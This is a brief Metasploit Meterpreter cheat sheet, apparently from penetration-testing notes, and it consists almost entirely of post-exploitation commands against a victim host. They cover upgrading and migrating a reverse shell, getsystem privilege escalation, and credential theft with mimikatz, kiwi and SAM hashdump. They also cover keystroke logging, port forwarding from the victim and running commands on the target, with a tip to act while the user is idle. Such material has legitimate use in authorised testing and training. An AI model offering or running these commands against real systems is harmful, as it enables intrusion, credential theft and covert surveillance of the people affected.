Upgrade a shell to a meter­preter shell

sessions -u $session_id

Cau­tion: Maybe the build­tu­ple is the wrong architecture.

Show process­es

ps

Show how long the user is not on his/her com­put­er (try things which could pop up shells pre­fer­refly after the sys­tem is idle for some time.)

idletime

Migrate into anoth­er process to make the con­nec­tion inde­pen­dend from the orig­i­nal (reverse shell) process (If this does­n’t work, maybe the meter­preter shell is not suit­able. Try to cre­ate a “real” meter­preter shell.)

run migrate -p $pid
migrate $pid

Try to get system

getsystem

Try to get cre­den­tials, load mimikatz / kiwi

load mimikatz
load kiwi
load incognito

Cre­ate port for­ward­ing of port 139 of the vic­tim to 1390 local.

meterpreter > portfwd add -l 1390 -p 139 -r 10.11.1.50

Note: See also the route com­mand in the Copy, rout­ing,.. arti­cle.

• shell — the most use­full: Cre­ates a full shell
• get­sys­tem tries to get a root shell
• sys­in­fo — shows gen­er­al info
• getu­id — shows the sys­tem’s name
• run post/windows/gather/hashdump — dumps the SAM database
• search ‑f *file*.txt — searchs the whole file sys­tem for a file
• upload <local_file> <remote_file>
• down­load <remote_file> <local_file>
• exe­cute ‑f cmd.exe ‑i ‑H — exe­cutes a com­mand on the target
• help for any­thing else
• Key­board logging: 
  • keyscan_start
  • keyscan_dump